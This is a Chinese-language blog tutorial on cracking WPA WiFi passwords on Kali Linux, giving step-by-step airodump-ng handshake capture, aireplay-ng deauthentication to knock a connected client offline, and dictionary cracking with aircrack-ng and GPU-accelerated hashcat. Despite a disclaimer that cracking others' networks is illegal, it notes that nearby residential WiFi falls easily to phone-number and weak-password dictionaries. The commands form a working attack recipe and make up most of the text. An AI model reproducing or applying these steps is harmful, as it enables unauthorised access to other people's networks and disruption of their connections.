各位小伙伴大家好鸭，鸽了好几天，今天突然发现一个比较好用的东西，下面听我慢慢道来

WIFI握手包破解

握手包简单理解就是发送指令与验证指令俗称密码验证 加密方式hash（哈希算法）

kali破解wifi密码

开始

1、选择合适的网卡，有些网卡kali识别不了，我用的网卡信息

2、网卡开启监听模式

3、查看监听模式是否开启成功（网卡名称变成wlan0mon说明已经开启成功）

4、输入“airodump-ng wlan0mon”，扫描附近热点信息，找到自己想要破解的热点名称后按下ctrl+c停止扫描（NEM-AL10是我自己用手机开启的热点，破解他人无线密码是违法的，自己搭个热点玩玩就行）

5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目录}”输入：airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon，当抓到握手包的时候箭头处会显示”handshake“字样

6、可以看到现在抓不到握手包，是因为没有客户端与AP进行连接。但是我们看到了一个已连接的热点，我们发送反认证包，让其下线，然后改客户端会重新尝试连接热点，然后我们就可以抓到握手包了。

新开一个终端窗口，命令格式为：aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址（STATION下面的地址）} 无线网卡名称

输入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”，系统会下线，然后重新连接，然后我们就可以抓到握手包了。

7、按下ctrl+c停止抓包。进到/home目录下查看握手包，其中"-01.cap"是我们一会儿破解要用到的数据包

8、使用aircrack-ng进行破解。命令格式：aircrack-ng -w {本地的字典文件（破解的关键）} {握手包}

输入"aircrack-ng -w top3000.txt /home/-01.cap"，由于握手包命名的特殊性，这里只能使用绝对路径，可以改个名字就可以使用相对路径了

字典啥的需要自备哦。小区附近的wifi用电话号码和弱密码成功概率极高

aircrack-ng优缺点

较为简单，上手即用，但诟病也比较大，在破解握手包时，CPU直接100%，啥事也干不成，对于双系统的我，更是不敢使用，晚上睡觉前跑包，一晚上能跑完。

Hashcat

hashcat号称世界上最快的密码破解，世界上第一个和唯一的基于GPGPU规则引擎，免费多GPU（高达128个GPU），多哈希，多操作系统（Linux和Windows本地二进制文件），多平台（OpenCL和CUDA支持），多算法，资源利用率低，基于字典攻击，支持分布式破解等等。

其实关键就是可以调用GPU进行破解，速度一流，原来两个小时40分钟的包，GTX 920M 缩减成40分钟。

但是在此之前，我们需要安装一些东西，众所周知，linux安装GPU驱动，有点危险，弄不好就会翻车。

https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/

但是我们可以直接安装 CUDA toolkit.

apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit

一键安装，绝不翻车。安装好了过后，重启一下。

nvidia-smi

hashcat -I

即可查看GPU信息

hashcat -b

进行算法测试，可以查看自己GPU的跑包的速度。

总体来说，跑的速度比CPU快的不知道多少倍，还可以拿linux玩玩其他的。

hashcat 跑包命令

hashcat -m 2500 *.hccapx 字典文件

注意：hccapx需要cap包转化成hccapx包

转化网址:https://hashcat.net/cap2hccapx/